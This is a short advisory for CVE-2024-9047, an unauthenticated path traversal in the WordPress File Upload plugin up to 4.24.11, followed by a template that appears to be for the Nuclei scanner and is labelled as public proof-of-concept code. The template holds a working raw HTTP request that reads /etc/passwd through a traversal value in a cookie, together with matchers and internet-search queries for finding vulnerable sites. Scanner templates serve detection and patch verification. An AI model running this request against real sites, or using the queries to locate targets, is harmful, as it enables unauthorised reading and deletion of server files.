The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
PoC代码[已公开]
id: CVE-2024-9047
info:
name: WordPress File Upload <= 4.24.11 - Arbitrary File Read
author: s4e-io
severity: critical
description: |
The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
reference:
- https://github.com/iSee857/CVE-2024-9047-PoC
- https://nvd.nist.gov/vuln/detail/cve-2024-9047
- https://plugins.trac.wordpress.org/changeset/3164449/wp-file-upload
- https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=cve
- https://github.com/wy876/POC
- https://www.usom.gov.tr/bildirim/tr-24-1670
- https://sploitus.com/exploit?id=3358E6CC-BC63-56E4-A4C4-1F70903C34D5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9047
cwe-id: CWE-22
epss-score: 0.92348
epss-percentile: 0.99717
metadata:
max-request: 1
vendor: nickolas_bossinas
product: wordpress-file-upload
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/wp-file-upload/"
fofa-query: body="/wp-content/plugins/wp-file-upload"
publicwww-query: /wp-content/plugins/wp-file-upload/
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev
variables:
file: "{{rand_base(16)}}"
ticket: "{{rand_base(16)}}"
upload: "{{rand_base(32)}}"
upload_more: "{{rand_base(32)}}"
time: "{{rand_int(1000000000000, 9999999999999)}}"
http:
- raw:
- |
GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file={{file}}&ticket={{ticket}}&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_{{upload}} HTTP/1.1
Host: {{Hostname}}
Cookie: wp_wpfileupload_{{upload}}={{upload_more}}; wfu_storage_{{file}}=/../../../../../etc/passwd[[name]]; wfu_download_ticket_{{ticket}}={{time}}; wfu_ABSPATH=/;
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/octet-stream")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100c29218e6d4e46f4c45aa3ab01915470ea18129d5949240e51b6b772495cea86302205e88e3ebc724668eefce21b0b154f03e9358c525167f69106e70a8dceb4a4d0d:922c64590222798bb761d5b6d8e72950